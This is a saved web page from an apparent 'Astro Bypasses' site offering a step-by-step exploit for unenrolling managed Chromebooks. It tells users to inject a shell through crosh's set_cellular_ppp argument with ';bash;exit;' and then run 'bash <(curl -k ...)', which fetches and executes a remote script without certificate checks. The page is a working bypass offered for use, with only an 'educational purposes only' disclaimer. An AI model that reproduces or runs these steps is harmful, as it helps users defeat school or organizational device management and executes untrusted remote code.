<!DOCTYPE html>
<!--IM NOT RESPONSIBLE FOR ANYTHING YOU DO WITH THE INFORMATION PROVIDED ON THIS SITE. THIS SITE IS FOR EDUCATIONAL PURPOSES ONLY-->
<html lang="en"><!-- Bootstrap CSS --><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><link rel="stylesheet" href="./Astro Operations_files/bootstrap.min.css" integrity="sha384-Vkoo8x4CGsO3+Hhxv8T/Q5PaXtkKtu6ug5TOeNV6gBiFeWPGFN9MuhOf23Q9Ifjh" crossorigin="anonymous">

<link rel="stylesheet" href="./Astro Operations_files/font-awesome.css">

<script src="./Astro Operations_files/jquery-3.4.1.slim.min.js.descarga" integrity="sha384-J6qa4849blE2+poT4WnyKhv5vZF5SrPo0iEjwBvKU7imGFAV0wwj1yYfoRSJoZ+n" crossorigin="anonymous"></script>
<script src="./Astro Operations_files/popper.min.js.descarga" integrity="sha384-Q6E9RHvbIyZFJoft+2mJbHaEWldlvI9IOYy5n3zV9zzTtmI3UksdQRVvoxMfooAo" crossorigin="anonymous"></script>
<script src="./Astro Operations_files/bootstrap.min.js.descarga" integrity="sha384-wfSDF2E50Y2D1uUdj0O3uMBJnjuUD4Ih7YwaYd1iqfktj0Uod8GCExl3Og8ifwB6" crossorigin="anonymous"></script>


    
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="All In One Astro Bypasses.">
    <link rel="stylesheet" href="./Astro Operations_files/bootstrap.min(1).css">
    <link rel="stylesheet" href="./Astro Operations_files/styles.css">
    <link rel="stylesheet" href="./Astro Operations_files/all.min.css">
    <script src="./Astro Operations_files/ism-2.2.min.js.descarga"></script>
    <style>
        .bg-home-4 {
            padding-top: 400px;
        }
    </style>
    <title>Astro Bypasses</title>
    <link rel="icon" href="./Astro Operations_files/icon.png">
</head>
<style>
    .bg-home-4 {
        padding-bottom: 165px;
    }
</style>
<body>
  
    <nav class="navbar navbar-expand-lg fixed-top navbar-custom" id="myNAV" style="background-color: #000000; padding: 10px;">
        <div class="container">
            <p>Astro Bypasses</p>
           
            <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarCollapse" aria-controls="navbarCollapse" aria-expanded="false" aria-label="Toggle navigation">
                <i class="mdi mdi-menu"></i>
            </button>
            <div class="collapse navbar-collapse" id="navbarCollapse">
                <ul class="navbar-nav ml-auto navbar-center" id="mySidenav" style="color: #000000;">
                    <li class="nav-item">
                        <a href="https://bypasses.net">Home</a>
                    </li>
                    <li class="nav-item">
                        <a href="https://discord.gg/5bu8eYYRYu" target="_blank">Discord</a>
                    </li>
                    <li class="nav-item">
                        <a href="https://discord.com/channels/@me" target="_blank">by fruvs#7642</a>
                    </li>
                </ul>
            </div>
        </div>
    </nav>

  
    <section class="bg-home-4" id="home">
        <div class="home-bg-overlay"></div>
        <div class="home-center">
            <div class="home-desc-center">
                <div class="container">
                    <div class="row vertical-content">
                        <div class="col-lg-6">
                            <center>
                                <img src="./Astro Operations_files/nosh1mm.png" width="275" height="250">
                            </center>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div class="svg-border-rounded">
            <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 144.54 17.34" preserveAspectRatio="none" fill="#161616"><path d="M144.54,17.34H0V0H144.54ZM0,0S32.36,17.34,72.27,17.34,144.54,0,144.54,0"></path></svg>
        </div>
    </section>
    <div> <head>
        <html>
<head>
<style>
    @import url('https://fonts.googleapis.com/css2?family=Comfortaa&display=swap');

    * {
        color: white;
        font-family: arial;
    }

    .my-button {
        font-family: Comfortaa;
        width: 220px;
        height: 40px;
        border-radius: 12px;
        background-color: #5d00ff;
        border: none;
        transition: background-color 500ms;
        margin: 0 auto;
        border-width: 2px;
        border-style: solid;
        border-color: white;
    }

    .my-button:hover {
        transition: transform .6s;
        background-color: #310070;
        -ms-transform: scale(1.1);
        /* IE 9 */
        -webkit-transform: scale(1.1);
        /* Safari 3-8 */
        transform: scale(1.1);
    }
</style>
</head>
<body>
<button onclick="window.location.href='https://bypasses.net'" class="my-button" style="display: block; margin: 0 auto;">Home</button>


<!-- Add more buttons here -->
</body>
</html><!DOCTYPE html>
        <html>
        <head>
            <meta charset="utf-8" />
            <meta http-equiv="X-UA-Compatible" content="IE=edge" />
            <meta name="viewport" content="width=device-width, initial-scale=1" />
            <meta charset="utf-8">
            <title>Wi-Fi Password Reader</title>
            <style>
                body {
                    color: white;
                    text-align: center;
                }
                input, button {
                    color: black;
                }
                #button-container {
                    margin-top: 20px;
                }
                #output {
                    white-space: pre-wrap;
                    text-align: left;
                }
                .button {
                    font-family: 'Comfortaa', sans-serif;
                    width: 220px;
                    height: 40px;
                    border-radius: 12px;
                    background-color: #5d00ff;
                    border: none;
                    transition: background-color 500ms;
                    border-width: 2px;
                    border-style: solid;
                    border-color: white;
                }
                .button:hover {
                    transition: transform .6s;
                    background-color: #310070;
                    -ms-transform: scale(1.1);
                    /* IE 9 */
                    -webkit-transform: scale(1.1);
                    /* Safari 3-8 */
                    transform: scale(1.1);
                }
            </style>
        </head>
        <body>
            <p>In order for this exploit to work you need to downgrade to exactly version 101</p>
            <p>This method requires crosh to be unblocked on your chromebook.</p>
            <p>
                Crosh can be opened with CTRL+ALT+T</p>
                <p>
                    If it's blocked by an extension, you can disable it with LTBEEF</p>
                    <p>STEPS</p>
                    <p>Open crosh (ctrl + alt + t)</p>
                  
                    <p>Type in </p>
                    <p>set_cellular_ppp \';bash;exit;\'</p> <p>press enter</p>
                    <p>Type in</p>
                    <p>bash <(curl -k https://coolelectronics.me/unroll)</p><p> then press enter again</p>
                    <p>When it asks are you sysadmin type "n" when it asks again type "n"</p>
                    <p>Wait for the script to finish, then powerwash your chromebook</p>
                    <p>To powerwash your chromebook logout of the chromebook and press (CTRL+ATL+SHIFT+R)</p>
        
            
               
            </div>
            
      
  </body>
</html>

    
    
    </div>
    <div>
        <script src='https://cdn.jsdelivr.net/npm/@widgetbot/crate@3' async defer>
            new Crate({
                server: '1075199537859285083', // Null Flux
                channel: '1075219720581693482' // #💬・chat
            })
        </script>
                </div>
                <div class="card-footer border-top">
                    Astro Bypasses by Fruvs#7642
                     </html>
                </div>
            </div>
        </div>
    </div>
